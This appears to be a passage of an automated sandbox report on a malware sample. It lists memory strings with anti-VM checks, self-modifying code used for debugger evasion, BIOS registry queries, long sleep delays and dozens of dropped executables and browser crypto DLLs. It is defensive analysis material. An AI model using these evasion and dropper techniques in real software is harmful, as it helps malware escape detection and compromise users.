                        Source: PA8JWMmRYiQsN7iqTjOvjsbW.exe, 00000020.00000001.1883456337.0000000000400000.00000040.00000001.01000000.00000017.sdmp, zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmpBinary or memory string: ... OMITTING ACCEPT-CHARSETAFTER EFIGUARDALLOCFREETRACEBAD ALLOCCOUNTBAD RECORD MACBAD RESTART PCBAD SPAN STATEBTC.USEBSV.COMCERT INSTALLEDCHECKSUM ERRORCONTENT-LENGTHCOULDN'T PATCHDATA TRUNCATEDDISTRIBUTOR_IDDRIVER REMOVEDERROR RESPONSEFILE TOO LARGEFINALIZER WAITGCSTOPTHEWORLDGET UPTIME: %WGETPROTOBYNAMEGOT SYSTEM PIDINITIAL SERVERINTERNAL ERRORINVALID SYNTAXIS A DIRECTORYKEY SIZE WRONGLEVEL 2 HALTEDLEVEL 3 HALTEDMEMPROFILERATEMULTIPARTFILESNEED MORE DATANIL ELEM TYPE!NO MODULE DATANO SUCH DEVICEOPEN EVENT: %WPARSE CERT: %WPROTOCOL ERRORREAD CERTS: %WREAD_FRAME_EOFREFLECT.VALUE.REMOVE APP: %WRUNTIME: FULL=RUNTIME: WANT=S.ALLOCCOUNT= SEMAROOT QUEUESERVER.VERSIONSTACK OVERFLOWSTART TASK: %WSTOPM SPINNINGSTORE64 FAILEDSYNC.COND.WAITTEXT FILE BUSYTIME.LOCATION(TIMEENDPERIODTOO MANY LINKSTOO MANY USERSTORRC FILENAMEUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERUSERARENASTATEVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WINDOW CREATEDWORK.FULL != 0XENSERVICE.EXEZERO PARAMETER WITH GC PROG
                        Tries to evade debugger and weak emulator (self modifying code)
                        Source: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exeSpecial instruction interceptor: First address: CE3339 instructions caused by: Self-modifying code
                        Source: C:\Users\user\Desktop\file.exeMemory allocated: 27F37A40000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\file.exeMemory allocated: 27F39070000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\file.exeMemory allocated: 27F59070000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: DB0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 2850000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 4850000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 7070000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 6500000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 83B0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 93B0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 96D0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: B6D0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: E6D0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: F250000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 15210000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 16210000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 1AAC0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 1BAC0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 22AC0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 22AC0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 23840000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                        Source: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                        Source: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 600000Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599875Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 300000Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599766Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599653Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599547Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599438Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599328Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599219Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599108Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598998Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598891Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598781Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598672Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598558Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598451Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598341Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598216Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598075Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597963Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597833Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597687Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597578Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597468Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597359Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597250Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597140Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597031Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596919Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596811Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596676Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596562Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596453Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596343Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596231Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596125Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596015Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595771Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595640Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595530Jump to behavior
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeThread delayed: delay time: 300000
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindow / User API: threadDelayed 6134Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindow / User API: threadDelayed 3641Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1066
                        Source: C:\Users\user\AppData\Local\Temp\u4dc.0.exeWindow / User API: threadDelayed 381
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_11-45196
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_4-21117
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_19-45205
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\bw9CU3SIyrt3JEs5ELMi3GM3.exeJump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeDropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\0bDSNbGYZjXnI1v06off3DYe.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeDropped PE file which has not been started: C:\Users\user\Pictures\2pjOwxxUjFNOdrkI94TdGraH.exeJump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeDropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\NpXiURSjfclxWgcUlkMD5eJ8.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeDropped PE file which has not been started: C:\Users\user\Pictures\0Flev5sTDyJ3duKpLfv5ka2Z.exeJump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\Retailer_prog[1].exeJump to dropped file
                        Source: C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Opera_installer_2404231937382151588.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeDropped PE file which has not been started: C:\Users\user\Pictures\NDdJEWHR1zXBL7ACRBN1bJsT.exeJump to dropped file
                        Source: C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\Opera_109.0.5097.59_Autoupdate_x64[4].exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\mozglue[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeDropped PE file which has not been started: C:\Users\user\Pictures\ugGFIzLnD3Xk89zL7XSYeDGh.exeJump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeDropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\IsEPzSszgrCYUPQvHPDrLyFU.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ra8RK0HZwqsQsFKuKAOljczn.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\CzCAVDbVcAMwrBna8hMGEVEa.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\softokn3[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeDropped PE file which has not been started: C:\Users\user\Pictures\0Bos1rjatCgxKDAqeI5gMROw.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\nss3[1].dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                        Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\appidpolicyconverter.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Fh7qhqxo9lqcq8fZJGpCZFiC.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\hK1ls0Ofsd3l9PBQOnBvFrY4.exeJump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\060[1].exeJump to dropped file
                        Source: C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404232137541\opera_packageJump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeDropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\GyEiPhmZ7wFSCYXwTgsPkluJ.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeDropped PE file which has not been started: C:\Users\user\Pictures\nMCfbx6hx0DUWGYJuDAMUAIJ.exeJump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\cad54ba5b01423b1af8ec10ab5719d97[1].exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\3CfyWUQfEPMLfwgMw9RKzj9q.exeJump to dropped file
                        Source: C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404232138021\opera_packageJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\msvcp140[1].dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\setup[1].exeJump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeDropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\Zsk2cFkeBC4UsceqkHvvw1iU.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\vcruntime140[1].dllJump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeDropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\PurfH4hAOpbVHLEkly68a3iu.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeDropped PE file which has not been started: C:\Users\user\Pictures\0DWhHyQpdxsJp4gA1M0WjqnA.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\IiFh1rXOMpGB7BnxmUig3wkQ.exeJump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeDropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\urA10ZckYEEXLZZov5c00RO_.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UIxMarketPlugin.dllJump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\Space_my[1].exeJump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeDropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\HDCJLf7pYcxae1KSycA6A5eR.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\1CGwy9Tr3ZgPn871BvByOPxR.exeJump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\123p[1].exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\sJ72s0PpaBNUmYNiHyJZFP9z.exeJump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeDropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\KPGhFRImEtP9uUl6Tmi54GCR.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\freebl3[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeDropped PE file which has not been started: C:\Users\user\Pictures\jZXBdg5rull5j6LgJCWVgVos.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeDropped PE file which has not been started: C:\Users\user\Pictures\WjXPtwNxqwEpWrekfMAFvnPV.exeJump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeDropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\PuQVr13ObJzLxhvCkSK1EXB6.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\driverRemote_debug\relay.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\01ySZukOlUcP5NF6FSceJyuX.exeJump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeDropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\62dRoO3BlNtGMcLNCSYzZeqJ.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeDropped PE file which has not been started: C:\Users\user\Pictures\2YL4IgWcBHinkIA211vO9Bpr.exeJump to dropped file
                        Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\ARP.EXEJump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\7725eaa6592c80f8124e769b4e8a07f7[1].exeJump to dropped file
                        Source: C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\Opera_109.0.5097.59_Autoupdate_x64[2].exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeDropped PE file which has not been started: C:\Users\user\Pictures\tSUKH8w2Pv8sgaLWrFPRDr1i.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\aTFJoaTi8xkup68H3WyrFIbQ.exeJump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\790489aa[1].exeJump to dropped file
                        Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\hh.exeJump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeDropped PE file which has not been started: C:\Users\user\Documents\SimpleAdobe\s2mORnBj3q8nWakBtFzD2977.exeJump to dropped file
                        Source: C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Opera_installer_2404231937415374172.dllJump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\timeSync[1].exeJump to dropped file
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeAPI coverage: 8.3 %
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeAPI coverage: 8.3 %
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeAPI coverage: 8.3 %
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464Thread sleep time: -20291418481080494s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464Thread sleep time: -600000s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464Thread sleep time: -599875s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7504Thread sleep count: 6134 > 30Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7504Thread sleep count: 3641 > 30Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7396Thread sleep time: -2100000s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464Thread sleep time: -599766s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464Thread sleep time: -599653s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464Thread sleep time: -599547s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464Thread sleep time: -599438s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464Thread sleep time: -599328s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464Thread sleep time: -599219s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464Thread sleep time: -599108s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464Thread sleep time: -598998s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464Thread sleep time: -598891s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464Thread sleep time: -598781s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464Thread sleep time: -598672s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464Thread sleep time: -598558s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464Thread sleep time: -598451s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464Thread sleep time: -598341s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464Thread sleep time: -598216s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464Thread sleep time: -598075s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464Thread sleep time: -597963s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7464Thread sleep time: -597833s >= -30000sJump to behavior
